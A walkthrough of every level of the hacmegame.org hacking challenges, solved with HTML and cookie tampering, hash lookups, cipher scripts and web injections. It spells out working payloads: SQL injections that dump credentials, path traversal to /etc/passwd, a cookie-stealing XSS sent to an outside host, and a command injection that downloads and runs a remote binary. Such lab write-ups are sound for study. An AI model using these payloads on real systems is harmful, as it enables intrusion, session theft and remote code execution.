Yes, this is another security/hacker site with challenges. This one is developed by NTNU (Norwegian University of Science and Technology).
A friend of mine asked me for some help on this site, so I thought I could make a tutorial/walkthrough for the whole thing instead.
Tools I will be using: Mozilla Firefox with Web Developer and Firebug addons
You should know basic HTML and maybe some JavaScript before you start on the challenges.
The site has 8 levels with 6 challenges on each level.
Level 1: The novice test
This is an extremely easy one, just view the source (hit ctrl+u) and you will find
Level 1: A slightly more interesting challenge
Same as before, view the source and find
This looks like a MAC address, which is hex. Let's convert it to decimal and then to ASCII and see what happens:
<?php
// The hex pairs from the "MAC address" found in the page source.
$x = array('38','39','47','7a','55','4f');
// hex -> decimal -> ASCII character for every pair.
$a = array_map('hexdec', $x);
$b = array_map('chr', $a);
print join('', $b);
?>
The code returns 89GzUO, which is the password (your password could be different).
Level 1: Confirm order
First write something random in the input fields then use web developer to edit the html (Misc -> Edit HTML).
Find the <input type="hidden"> and change the value to 0, then hit the submit button. Done.
Level 1: Random number puzzle
Here we need to get the current sum equal to the objective sum. Let's edit the html again and find:
<select id="addition" name="addition">
<option value="775">775</option>
<option value="926">926</option>
<option value="205">205</option>
</select>
For me the objective sum is 2282. So change the html to:
<select id="addition" name="addition">
<option value="2282">2282</option>
<option value="926">926</option>
<option value="205">205</option>
</select>
You also need to change the subtraction form, or else it will subtract 570 and we end up with 2282 - 570.
So we simply set the first value to 0.
<select id="subtraction" name="subtraction">
<option value="0">0</option>
<option value="177">177</option>
<option value="891">891</option>
</select>
Hit submit and you are done.
Level 1: Digging journalism
Here we need to find the newest press release pdf file. This is just simple brute force of the file name.
We can see that the newest is: http://www.hacmegame.org/hacmegame/challenges/press_release_09_q1.pdf
Let's try:
http://www.hacmegame.org/hacmegame/challenges/press_release_09_q2.pdf
Success!
Level 1: The Garden of Eden
This is a weird challenge, but let us turn into an angel!
We can use Web Developer again here. (Cookies -> View cookie information)
Find the cookie with the name "accessClass" and change the value from "human" to "angel".
Hit "Enter paradise" and you are done with Level 1 (Warm up)
Level 2: Are you still with us?
View the source and we find an md5 hash, google it and we get the answer right away: "md5:2e33bc25e7d8e08704d2a9498b974868:pusa"
Level 2: Accessing secret information
We get the text "hvs doggkcfr bssrsr hc sbhsf hvwg gsqfsh rohopogs ct ucjsfbasbh gsqfshg wg pohhsfm - yssd hvs wbtcfaohwcb jsfm gsqfsh".
Looks like rot13, but it isn't. So let us try a script which runs rot 1 to 25...
<?php
// The ciphertext from the challenge page.
$string = 'hvs doggkcfr bssrsr hc sbhsf hvwg gsqfsh rohopogs ct ucjsfbasbh gsqfshg wg pohhsfm - yssd hvs wbtcfaohwcb jsfm gsqfsh';

// Generalised rot13: shift every ASCII letter by $n positions, leave other characters alone.
function str_rot($s, $n = 13) {
    $n = (int)$n % 26;
    if (!$n) return $s;
    for ($i = 0, $l = strlen($s); $i < $l; $i++) {
        $c = ord($s[$i]);
        if ($c >= 97 && $c <= 122) {          // a-z
            $s[$i] = chr(($c - 71 + $n) % 26 + 97);
        } else if ($c >= 65 && $c <= 90) {    // A-Z
            $s[$i] = chr(($c - 39 + $n) % 26 + 65);
        }
    }
    return $s;
}

// Print every candidate shift so the English one can be picked out by eye.
for ($i = 1; $i < 26; $i++) {
    print "($i) " . str_rot($string, $i) . "\n\n";
}
?>
Output:
echofish@ubuntu:~/Desktop$ php sadf.php
(1) iwt ephhldgs cttsts id tcitg iwxh htrgti spipqpht du vdktgcbtci htrgtih xh qpiitgn - ztte iwt xcudgbpixdc ktgn htrgti
(2) jxu fqiimeht duutut je udjuh jxyi iushuj tqjqrqiu ev weluhdcudj iushuji yi rqjjuho - auuf jxu ydvehcqjyed luho iushuj
(3) kyv grjjnfiu evvuvu kf vekvi kyzj jvtivk urkrsrjv fw xfmviedvek jvtivkj zj srkkvip - bvvg kyv zewfidrkzfe mvip jvtivk
(4) lzw hskkogjv fwwvwv lg wflwj lzak kwujwl vslstskw gx ygnwjfewfl kwujwlk ak tsllwjq - cwwh lzw afxgjeslagf nwjq kwujwl
(5) max itllphkw gxxwxw mh xgmxk mabl lxvkxm wtmtutlx hy zhoxkgfxgm lxvkxml bl utmmxkr - dxxi max bgyhkftmbhg oxkr lxvkxm
(6) nby jummqilx hyyxyx ni yhnyl nbcm mywlyn xunuvumy iz aipylhgyhn mywlynm cm vunnyls - eyyj nby chzilguncih pyls mywlyn
(7) ocz kvnnrjmy izzyzy oj ziozm ocdn nzxmzo yvovwvnz ja bjqzmihzio nzxmzon dn wvoozmt - fzzk ocz diajmhvodji qzmt nzxmzo
(8) pda lwoosknz jaazaz pk ajpan pdeo oaynap zwpwxwoa kb ckranjiajp oaynapo eo xwppanu - gaal pda ejbkniwpekj ranu oaynap
(9) qeb mxpptloa kbbaba ql bkqbo qefp pbzobq axqxyxpb lc dlsbokjbkq pbzobqp fp yxqqbov - hbbm qeb fkclojxqflk sbov pbzobq
(10) rfc nyqqumpb lccbcb rm clrcp rfgq qcapcr byryzyqc md emtcplkclr qcapcrq gq zyrrcpw - iccn rfc gldmpkyrgml tcpw qcapcr
(11) sgd ozrrvnqc mddcdc sn dmsdq sghr rdbqds czszazrd ne fnudqmldms rdbqdsr hr azssdqx - jddo sgd hmenqlzshnm udqx rdbqds
(12) the password needed to enter this secret database of government secrets is battery - keep the information very secret
(13) uif qbttxpse offefe up foufs uijt tfdsfu ebubcbtf pg hpwfsonfou tfdsfut jt cbuufsz - lffq uif jogpsnbujpo wfsz tfdsfu
(14) vjg rcuuyqtf pggfgf vq gpvgt vjku ugetgv fcvcdcug qh iqxgtpogpv ugetgvu ku dcvvgta - mggr vjg kphqtocvkqp xgta ugetgv
(15) wkh sdvvzrug qhhghg wr hqwhu wklv vhfuhw gdwdedvh ri jryhuqphqw vhfuhwv lv edwwhub - nhhs wkh lqirupdwlrq yhub vhfuhw
(16) xli tewwasvh riihih xs irxiv xlmw wigvix hexefewi sj kszivrqirx wigvixw mw fexxivc - oiit xli mrjsvqexmsr zivc wigvix
(17) ymj ufxxbtwi sjjiji yt jsyjw ymnx xjhwjy ifyfgfxj tk ltajwsrjsy xjhwjyx nx gfyyjwd - pjju ymj nsktwrfynts ajwd xjhwjy
(18) znk vgyycuxj tkkjkj zu ktzkx znoy ykixkz jgzghgyk ul mubkxtsktz ykixkzy oy hgzzkxe - qkkv znk otluxsgzout bkxe ykixkz
(19) aol whzzdvyk ullklk av lualy aopz zljyla khahihzl vm nvclyutlua zljylaz pz ihaalyf - rllw aol pumvythapvu clyf zljyla
(20) bpm xiaaewzl vmmlml bw mvbmz bpqa amkzmb libijiam wn owdmzvumvb amkzmba qa jibbmzg - smmx bpm qvnwzuibqwv dmzg amkzmb
(21) cqn yjbbfxam wnnmnm cx nwcna cqrb bnlanc mjcjkjbn xo pxenawvnwc bnlancb rb kjccnah - tnny cqn rwoxavjcrxw enah bnlanc
(22) dro zkccgybn xoonon dy oxdob drsc combod nkdklkco yp qyfobxwoxd combodc sc lkddobi - uooz dro sxpybwkdsyx fobi combod
(23) esp alddhzco yppopo ez pyepc estd dpncpe olelmldp zq rzgpcyxpye dpncped td mleepcj - vppa esp tyqzcxletzy gpcj dpncpe
(24) ftq bmeeiadp zqqpqp fa qzfqd ftue eqodqf pmfmnmeq ar sahqdzyqzf eqodqfe ue nmffqdk - wqqb ftq uzradymfuaz hqdk eqodqf
(25) gur cnffjbeq arrqrq gb ragre guvf frperg qngnonfr bs tbireazrag frpergf vf onggrel - xrrc gur vasbezngvba irel frperg
Looks like rot12 to me ;>
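Instead of reading all 25 lines by eye, the shift can be picked automatically by scoring each candidate for common English words. This is an added example in Python (not the post's PHP script) that reuses the Level 2 ciphertext above; the small word list and the function names are my own.

```python
"""Brute-force every Caesar shift and pick the plaintext by English-word score."""
import string

# Ciphertext copied from the post ("Level 2: Accessing secret information").
CIPHERTEXT = ("hvs doggkcfr bssrsr hc sbhsf hvwg gsqfsh rohopogs ct ucjsfbasbh "
              "gsqfshg wg pohhsfm - yssd hvs wbtcfaohwcb jsfm gsqfsh")

# A tiny word list is enough to separate English from the 24 wrong shifts.
COMMON_WORDS = {"the", "to", "is", "of", "and", "this", "very", "keep",
                "password", "secret", "information", "enter", "needed"}


def shift_text(text, n):
    """Shift every ASCII letter by n positions (ROT-n); other characters are kept."""
    n %= 26
    lower = string.ascii_lowercase
    upper = string.ascii_uppercase
    table = str.maketrans(lower + upper,
                          lower[n:] + lower[:n] + upper[n:] + upper[:n])
    return text.translate(table)


def score_english(text):
    """Count tokens that are common English words (surrounding punctuation ignored)."""
    return sum(1 for tok in text.split() if tok.strip("-.,;:!?") in COMMON_WORDS)


def all_shifts(ciphertext):
    """(shift, candidate plaintext) for every shift 1..25, like the post's loop."""
    return [(n, shift_text(ciphertext, n)) for n in range(1, 26)]


def best_shift(ciphertext):
    """Return the (shift, plaintext) pair whose candidate looks most like English."""
    return max(all_shifts(ciphertext), key=lambda pair: score_english(pair[1]))


if __name__ == "__main__":
    n, plaintext = best_shift(CIPHERTEXT)
    print(f"shift {n}: {plaintext}")
```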
Level 2: We Make Webpages Inc
Edit the HTML with Web Developer and find this code:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS12.html" onsubmit="return checkValid(document.getElementById('email'));">
Remove onsubmit so the code looks like this:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS12.html">
Write some random email address and hit submit.
Level 2: Free pets
Select maximum pets in the select boxes.
Change this
<input id="sum1" name="sum1" readonly="readonly" value="550" size="6" type="text">
<input id="sum2" name="sum2" readonly="readonly" value="29" size="6" type="text">
to this
<input id="sum1" name="sum1" readonly="readonly" value="0" size="6" type="text">
<input id="sum2" name="sum2" readonly="readonly" value="0" size="6" type="text">
and this
<input id="totalDummySum" name="totalDummySum" disabled="disabled" value="579" size="6" type="text">
to this
<input id="totalDummySum" name="totalDummySum" value="0" size="6" type="text">
Hit buy and you will get those pets for free!
Level 2: Vladimir Vladimirovitsj Putin's guestbook
Write "%3cscript%3e" in his guestbook and you are done (http://www.w3schools.com/TAGS/ref_urlencode.asp)
Done with Level 2!
Level 3: Lottery lothario
Edit the html with Web Developer (Misc -> Edit HTML)
Find the code:
<select id="tickets" onchange="return process()">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
And change to:
<select id="tickets">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="2147483647">5</option>
</select>
Notice we change the value and removed the JavaScript function.
Then find:
<input id="num" name="num" value="5" type="hidden">
And change to:
<input id="num" name="num" value="2147483647" type="hidden">
Then select 5 in the select box and hit buy. Done.
Level 3: VIP
After hovering over some available seats, you find that the link is ?row=X&seat=Y.
Now just figure out the row and seat number of a VIP seat and go to the URL manually.
http://www.hacmegame.org/hacmegame/challenges/ChallengeS38.html?row=6&seat=3
Easy peasy :)
Level 3: Still hanging in there?
View the source and you will find a sha1 hash which I googled and I got:
"gsg : c53118b2b90b4d67eeaef61ea37344ed5c09f7c7"
Level 3: Text analysis was your favorite subject at school
So we get this text:
jf cdo vjonuhogv lgofgavdl fkdf ogrgadu jqyhaxdu zsf vjagnf nhqfdnfo kdrg zggq xdvg cjfk bhujfjndu agbagogqfdfjrgo hy fkg rjgf nhqm jq xhonhc - uhm jq cjfk bdoochav dyydja fh agdv fkg vgfdjuo
This is the challenge I spent the most time on. It's a slow process of trying to replace each character with another until words appear.
I ended up with this script:
<?php
// The ciphertext from the challenge page.
$string = 'yf cbo syodhwoas uaofamsbu fvbf oakambh ygrwmqbh tzf symadf dwgfbdfo vbka taag qbsa cyfv jwhyfydbh majmaoagfbfykao wr fva kyaf dwge yg qwodwc - hwe yg cyfv jboocwms tbffamu fw mabs fva safbyho';
// Cipher letters ($x) and the plaintext letter each one is currently guessed to stand for ($y).
$x = array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', ' ');
$y = array('e','a','w','c','e','t','n','l','i','p','v','l','r','n','s','p','m','r','d','b','y','h','o','x','i','z', ' ');
$newstring = '';
foreach (str_split($string) as $val) {
    $idx = array_search($val, $x, true);
    // Characters not in the table (e.g. '-') are kept as they are.
    $newstring .= ($idx === false) ? $val : $y[$idx];
}
print $newstring;
?>
Here is some of the process:
echofish@ubuntu:~/Desktop$ php sadf.php
it cas sisdhwsas uastamsau tvat sakamah igrwmqah tzt simadt dwgtadts vaka taag qasa citv pwhitidah mapmasagtatikas wr tva kiat dwge ig qwsdwc a hwe ig citv passcwms tattamu tw maas tva sataihs
echofish@ubuntu:~/Desktop$ php sadf.php
it was sisdhosas uastamsau tvat sakamah igromqah tzt simadt dogtadts vaka taag qasa witv pohitidah mapmasagtatikas or tva kiat doge ig qosdow a hoe ig witv passwoms tattamu to maas tva sataihs
echofish@ubuntu:~/Desktop$ php sadf.php
it was disdhosad uastardau tvat sakarah igrorqah tzt diradt dogtadts vaka taag qada witv pohitidah raprasagtatikas or tva kiat doge ig qosdow a hoe ig witv password tattaru to raad tva dataihs
echofish@ubuntu:~/Desktop$ php sadf.php
it was disdhosad uastardau that sakarah igrorqah tzt diradt dogtadts haka taag qada with pohitidah raprasagtatikas or tha kiat doge ig qosdow a hoe ig with password tattaru to raad tha dataihs
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosad uastardau that sakaral igrorqal tzt diract cogtacts haka taag qada with political raprasagtatikas or tha kiat coge ig qoscow a loe ig with password tattaru to raad tha datails
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosad uastardau that sakaral inrorqal tzt diract contacts haka taan qada with political raprasantatikas or tha kiat cone in qoscow a loe in with password tattaru to raad tha datails
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed uesterdau that sekeral inrorqal tzt direct contacts hake teen qade with political representatikes or the kiet cone in qoscow e loe in with password tatteru to read the details
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed uesterdau that several inrorqal tzt direct contacts have teen qade with political representatives or the viet cone in qoscow e loe in with password tatteru to read the details
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed uesterdau that several inrorqal bzt direct contacts have been qade with political representatives or the viet cone in qoscow e loe in with password batteru to read the details
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed uesterdau that several inrormal bzt direct contacts have been made with political representatives or the viet cone in moscow e loe in with password batteru to read the details
echofish@ubuntu:~/Desktop$ php sadf.php
it was disclosed yesterday that several inrormal bzt direct contacts have been made with political representatives or the viet cone in moscow e loe in with password battery to read the details
Didn't need to decrypt further :-)
A little weird that the password was used before...
Level 3: George Bush's guestbook
Looked like they stripped HTML tags, so I tried <<script>script> which worked!
Now on to level 4...
Level 4: Ship some pets far out
Open Firebug. Inspect the HTML, and you will find that there are some JavaScript files being included.
Let's take a look at those.
function validatePetshopAddress(){
    if (document.getElementById('name').value == "") {
        msg("input_error", "error", "Please enter your name");
        return false;
    } else if (zipCodeToCity() === false) {
        msg("input_error", "error", "We don't deliver here");
        return false;
    } else {
        insert();
        return true;
    }
}
function insert() {
    var objForm = document.getElementById("val");
    var objInput = document.createElement("input");
    objInput.setAttribute('type','hidden');
    objInput.setAttribute('name','val');
    objInput.setAttribute('value','af883cadbe96b8a16ac8340e264b9f7526b9e5a9e2f249e4d4c641934aae05b5');
    objForm.insertBefore(objInput, objForm.firstChild);
}
So what is basically going on here is that if the address is valid, the insert() function is executed, and insert() creates a hidden input with a fixed value. So let's take a shortcut and just create that hidden input manually.
Just copy what's inside insert() (between the braces {}) and paste it into the JavaScript console in your browser.
Now change the HTML...
Remove the onsubmit:
<form id="val" method="post" action="/hacmegame/challenges/ChallengeS11.html" onsubmit="return validatePetshopAddress()">
It should look like this:
<form id="val" method="post" action="/hacmegame/challenges/ChallengeS11.html">
Then find:
<select onchange="return zipCodeToCity()" id="zipcode" name="zipcode">
<option value="0"> </option>
<option value="7003">7003</option>
<option value="7007">7007</option>
<option value="7056">7056</option>
<option value="7092">7092</option>
<option value="7080">7080</option>
<option value="7082">7082</option>
<option value="7098">7098</option>
</select>
Remove the onchange and add another <option> to it:
<select id="zipcode" name="zipcode">
<option value="0"> </option>
<option value="7003">7003</option>
<option value="7007">7007</option>
<option value="7056">7056</option>
<option value="7092">7092</option>
<option value="7080">7080</option>
<option value="7082">7082</option>
<option value="7098">7098</option>
<option value="1337">1337</option>
</select>
Now we need to make the city input writeable:
Replace:
<input name="city" id="city" size="15" readonly="true" type="text">
with:
<input name="city" id="city" size="15" type="text">
Select 99 "real midget sheeps", write a random name, select 1337 as the ZIP code, and write something random for city. Hit the submit button and win!
Level 4: Doctor Online for humans only
View cookie information with Web Developer and find the cookie named "cptch". Mine has the value 31:46:64:58:38.
Then we can see what happens when we turn this into ASCII.
php > print chr(31).chr(46).chr(64).chr(58).chr(38);
.@:&
That didn't look right. Let's assume it's hex and make it decimal before we turn it into ASCII:
php > print chr(hexdec(31)).chr(hexdec(46)).chr(hexdec(64)).chr(hexdec(58)).chr(hexdec(38));
1FdX8
Yep, it worked.
Level 4: Access the exam
We are given an HTTP request, and what we are after is this:
Authorization Basic Z29yYmFjaGV2OnFKOHIyMk4xQ0Q=
This is base64 encoding (not encryption). I used this website to decode it:
gorbachev:qJ8r22N1CD
Level 4: The break-in
Nothing useful in the source; I reckon this is an SQL injection challenge. Let's try the textbook injection example.
Write this as username and password:
' OR '1'='1
Success!
Level 4: My Sick Book Face
View cookie information with Web Developer and you will find a cookie named "sId" with a unique id: 6d:6f:68:63:6e:75:a0
What happens if we change the id to the previous one, which would be: 6d:6f:68:63:6e:75:9f
Reload the page and we get a nice green text which states "Completed"
Level 4: Industrial espionage
By hovering over the link we can see that the include script is extremely poor and insecure. It would look something like:
include ($_GET['read']);
Here we can include exactly what we want. So let's go for the unix password file.
Click on the admin link and replace admin.html in the address bar with:
../../../etc/passwd
The url should look like this now: http://www.hacmegame.org/hacmegame/challenges/ChallengeS26.html?read=../../../etc/passwd
Hit enter and the passwd file is included; here is the content:
nikita:XltRLNV1
Go to the admin page again and write "nikita" as username and "XltRLNV1" as password.
Now we are done with level 4...
Level 5: iBay - free toilet paper
View cookie information with Web Developer.
Find the cookie named "lastFinishedStep" and change its value to 2.
Now go to:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS18.html?step=3
Level 5: Breaking the barrier
In the source we see that a JavaScript file is included with the name:
['\x6A\x73\x2F\x74\x6F\x70\x73\x65\x63\x72\x65\x74\x73\x75\x70\x65\x72\x64\x75\x70\x65\x72\x2E\x6A\x73'][0x0]
Let us find out the name in plain text...
In a new tab enter:
javascript:alert("['\x6A\x73\x2F\x74\x6F\x70\x73\x65\x63\x72\x65\x74\x73\x75\x70\x65\x72\x64\x75\x70\x65\x72\x2E\x6A\x73'][0x0]");
Result: ['js/topsecretsuperduper.js'][0x0]
Here it is:
http://www.hacmegame.org/hacmegame/js/topsecretsuperduper.js
Now take a look at this script:
function validate_form(thisform) {
    with (thisform) {
        if (validate_required(inputfield, "input_error") == false) {
            inputfield.focus();
            return false;
        } else {
            insert();
            return true;
        }
    }
}
function insert() {
    var objForm = document.getElementById("val");
    var objInput = document.createElement("input");
    objInput.setAttribute('type','hidden');
    objInput.setAttribute('name','val');
    objInput.setAttribute('value','0fc826d06103c0e423e9bac849b36e91c05506a5708dd8b9bd1f596e1ef93c9a');
    objForm.insertBefore(objInput, objForm.firstChild);
}
Run that insert() function in the JavaScript console or in Firebug.
Now edit the HTML. Replace this:
<form id="val" method="post" action="/hacmegame/challenges/ChallengeS42.html?hs=1" onsubmit="return validate_form(this);">
with this:
<form id="val" method="post" action="/hacmegame/challenges/ChallengeS42.html?hs=1">
Then write <script> in the input and then submit.
Level 5: SMS tool
The form:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS28.html">
<h3>Send SMS</h3>
<!-- } else if(request.getParameter("sms").length()>160 && !request.getParameter("admin").equals("true")) { -->
<span id="*.errors" class="error">The SMS message is too long.</span>
<p>Free SMS messages left : 0</p>
<p>Recipient's number: <br><input id="number" name="number" type="text" value="12345678" maxlength="8"/></p>
<p>
Message:<br />
<textarea id="sms" name="sms" onkeyup="displayCharLenght('sms', 'smsLen', 160)" onfocus="displayCharLenght('sms', 'smsLen', 160)"></textarea><br />
SMS length: <b><span id="smsLen">0</span></b>/160<br />
</p>
<p><input type="submit" class="submit" value="Send SMS" /></p>
</form>
The comment suggests that to become an admin there should be an input named "admin" which needs to be set to "true".
So simply add
<input name="admin" value="true" />
to the form.
Then change the length argument of the displayCharLenght() calls:
onkeyup="displayCharLenght('sms', 'smsLen', 9999999)" onfocus="displayCharLenght('sms', 'smsLen', 9999)"
(I don't think this step is necessary, since you are an admin, but I did it.)
Enter a large text on the form and submit.
Level 5: FaceSpace - forum spammers
Snatch the url to delete the forum thread: ?delete=19423
Then write in the comment field:
<img src="?delete=19423" />
Level 5: FaceSpace - a space for your face
This SQL should get the password instead of the status:
SELECT username,password as status, rank FROM user--
Complete URL:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS22.html?o=username;SELECT%20username,password%20as%20status,%20rank%20FROM%20user--
And we get a list of users with password, here is one:
gorbatsjov:6ECkGsQd
Level 6: Terminate the register of taxpayers
The form runs the JavaScript function ff32() when submitted:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS14.html" onsubmit="return ff32();">
Remove the onsubmit so it looks like this:
<form id="challenge" method="post" action="/hacmegame/challenges/ChallengeS14.html">
The ff32() function is included in the header of the html:
<script type="text/javascript" src="/hacmegame/js/taxsearch.js" ></script>
Let's take a look at the function:
function ff32(_0xfc4dx7)
{
var _0xfc4dx8="";
_0xfc4dx8+=ff92(document["getElementById"]("fname")["value"]);
_0xfc4dx8+=ff12(document["getElementById"]("lname")["value"]);
_0xfc4dx8+=ff88(document["getElementById"]("zipcode")["value"]);
if(_0xfc4dx8!="")
{
alert(_0xfc4dx8);
return false;
}
document["getElementById"]("verification")["value"]=SHA256(navigator["userAgent"]);
return true;
}
On success it sets the value of a hidden input to SHA256(navigator["userAgent"]).
For me navigator["userAgent"] returns:
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13
and SHA256 of that:
c3d865842b6e9c392cbad25ae3e83814edc42c715013deb0599041b43405148f
We can set the value of the input manually by writing this in Firebug or the JavaScript console:
document["getElementById"]("verification")["value"]=SHA256(navigator["userAgent"]);
or just insert the value directly into the html.
Execute it.
Now leave the input fields blank in the form and hit the submit button. Success!
Level 6: iBay - free bazooka
Download the RefControl plugin for Firefox here
Open RefControl and add the following:
Site: "www.hacmegame.com",
Action:"http://www.hacmegame.org/hacmegame/challenges/ChallengeS19.html?step=3"
Go to:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS19.html?step=4 and win!
Level 6: Swedian sends you high up in the sky
We have only the <b> html tag for this one and the hint suggests onmouseover. Let's also use document.cookie for this one.
<b onmouseover="javascript:location.href='http://myhaxorsite.tk?cookiedata=' + document.cookie;">asdf</b>
Nice little challenge :-)
Level 6: Breaking FaceSpace
Time to inject some SQL.
This SQL should get the password instead of the status:
SELECT rank,username,password as status FROM user--
Here is the complete url:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS23.html?offset=50;select%20rank,username,password%20as%20status%20FROM%20user--
Pick a random username and its password. Complete.
Level 6: FaceSpace - write on my floor
Simply write this on your wall:
<img src="?input=asdf&submit=1" />
Since the form is method="get", the input fields are sent in the url. Now every visitor will request this link and post 'asdf' on your wall :)
Level 7: Industrial espionage - continued
..%2F..%2F..%2Fetc%2Fpasswd
You can figure out the rest :)
Level 7: Piggybacking
Heh, got this on the first try ;)
;wget http://myhaxorsite.tk/superduperprogram;./superduperprogram
Level 7: Photo Knutson
Time for some more SQL injection.
Replace gid in the URL with: ' or '1'='1
Then the URL should look like this:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS16.html?uid='%20or%20'1'='1&gid=61953
Then click on a link at the menu. Then you will see "Me at nude beach 1977". Click on it and done.
Level 7: Illuminati's secret web
Let's take a look at that incredible CMS:
http://www.hacmegame.org/hacmegame/files/cms.php.txt
This is the critical code:
$MODE_CMS_DEBUG = (CmsSetting::get('debug-mode') || CmsUtil::parseToBool($_COOKIE['cms-debug-mode'])) ? true : false;
if($MODE_CMS_DEBUG){
    if($_GET['debug_username'])
        echo "<!-- " . DatabaseHandler::debugResultToString(DatabaseHandler::query("SELECT * FROM user WHERE username='" . $_GET['debug_username'] . "';")) . " -->";
}
Make a cookie named "cms-debug-mode" with value "1".
Then add to the url in the address bar: ?debug_username=' or '1'='1
Like this: www.hacmegame.org/hacmegame/challenges/ChallengeS8.html?debug_username='%20or%20'1'='1
Hit enter.
Now I should find this in the source:
Log in and have fun!
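The reason ' or '1'='1 works here (and at Level 4, "The break-in") is that the user-supplied value is spliced straight into the SQL text, so the quotes become syntax. This added example (not code from hacmegame) rebuilds that lookup in SQLite with a constructed two-row user table and shows the same input returning every row from the concatenated query and no rows from a parameterized one; the table contents and function names are invented for the example.

```python
"""String-built SQL versus a parameterized query, on a constructed user table."""
import sqlite3

# Constructed sample rows; the names and passwords are invented for this example.
USERS = [("alice", "hunter2"), ("bob", "letmein")]
INJECTION = "' or '1'='1"   # the same input the post uses


def make_db():
    """In-memory SQLite database with a user table like the one the CMS queries."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user (username TEXT, password TEXT)")
    con.executemany("INSERT INTO user VALUES (?, ?)", USERS)
    return con


def lookup_vulnerable(con, username):
    """Mirrors cms.php: the raw request value becomes part of the SQL text."""
    sql = "SELECT username FROM user WHERE username='" + username + "'"
    return sorted(row[0] for row in con.execute(sql))


def lookup_safe(con, username):
    """The value travels as a bound parameter and can never become SQL syntax."""
    sql = "SELECT username FROM user WHERE username=?"
    return sorted(row[0] for row in con.execute(sql, (username,)))


def demo():
    """Run both lookups with the injection string and with an ordinary username."""
    con = make_db()
    return {
        "vulnerable_injected": lookup_vulnerable(con, INJECTION),
        "safe_injected": lookup_safe(con, INJECTION),
        "vulnerable_normal": lookup_vulnerable(con, "alice"),
        "safe_normal": lookup_safe(con, "alice"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```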
Level 7: Farm Automagical Systems INC
Looks like another SQL injection case, and we need to keep in mind to escape quotes.
The standard injection didn't work in the input fields: \' or \'1\'=\'1
Need to think of something else... Hmm, a cookie named sessionID.
Tried to change the value. And I got the error message: "Illegal session id." from the site.
I bought some hints, which gave me nothing at all:
- The login fields themselves are secured.
- How does the system identify users?
- A simple injection is all that's needed
- What rhymes with rookie (except your name)?
Then I tried to use the injection with the cookie, and it worked!
So just change the value of the cookie to: \' or \'1\'=\'1
Level 8: The poet
The first thing we see is that files are included directly from a URL parameter.
At the admin page, the URL looks like this:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS30.html?include=admin.php
At the other pages, the URL looks like this:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS30.html?read=poem3.html
So why not try ?read=admin.php
"Illegal file type - I don't like you." Oops :/
Smells like a poison null byte, so let's try this then: ?read=admin.php%00.html
<?php
session_start();
if ($_SESSION['authenticated'] || $_POST['username'] == 'brezhnev' && $_POST['password'] == 'c2SIdZX5') {
    $_SESSION['authenticated'] = true;
    printAdminForm();
} else {
    printLoginForm();
}
?>
Yep. That easy.
To read more about the poison null byte: http://insecure.org/news/P55-07.txt
Level 8: Ultra quick index search
Googled: "Red Code Inc's UQI-search is powered by Microsoft Internet Information Services (IIS) 5.0, Microsoft Index Server 2.0 and Microsoft Windows 2000 Server."
Found: http://www.cert.org/advisories/CA-2001-19.html and http://en.wikipedia.org/wiki/Code_Red_(computer_worm)
Used: http://www.hacmegame.org/hacmegame/challenges/default.ida?
Done.
Level 8: All your emails are belong to us
Tried first: asdf@asdf.com';select * from mails
That gave me this error:
Unexpected token: ; in statement [INSERT INTO mailinglist (email) VALUES ('asdf@asdf.com';]
Got some useful information, so let's try this then:
asdf@asdf.com');select * from mailinglist--
Success.
Level 8: Extraterrestrial contact
Assuming this is yet another SQL injection challenge, I tried:
http://www.hacmegame.org/hacmegame/challenges/ChallengeS25.html?errorid=;
Then I got this error message:
java.sql.SQLException: Unexpected token: ; in statement [SELECT text FROM error WHERE id = ;]
Now I know what the query looks like.
Trying to get the query to look like this so I can log in with asdf:asdf
SELECT text FROM error WHERE id = 0;INSERT INTO user (username,password) VALUES ('asdf','asdf')
with: ?errorid=0;INSERT%20INTO%20user%20(username,password)%20values%20('asdf','asdf')
But I get: "A unknown error occurred" :/
New tactic:
?errorid=0;SELECT username as text FROM user
Oh, it printed out "josef" :)
And of course we need the password too:
?errorid=0;SELECT password as text FROM user
Which printed out: OQ2UeotG
Success!
Level 8: Fresh Fish Online
Hints say something about XPath.
Found this: http://www.ibm.com/developerworks/xml/library/x-xpathinjection/index.html and this http://www.ethicalhacker.net/content/view/185/24/
Read some and tried: ?item='] | /* | /foo[bar='
Which resulted in:
gorbatsjovsomerlmikhailahpnfngorbachevejzvmu: Fresh salmon of last weekThis is the freshest salmon we offer in our shop. Delivery time by mail approximately three days. 65Smelly codSmells like heaven. Can't be sent by mail because of undefined reasons, will be sent with delivery boy. Delivery time approximately two years.5
I think I got all the usernames and passwords. Let's try 'gorbatsjov' as username and 'somerl' as password.
There you go. All levels complete :)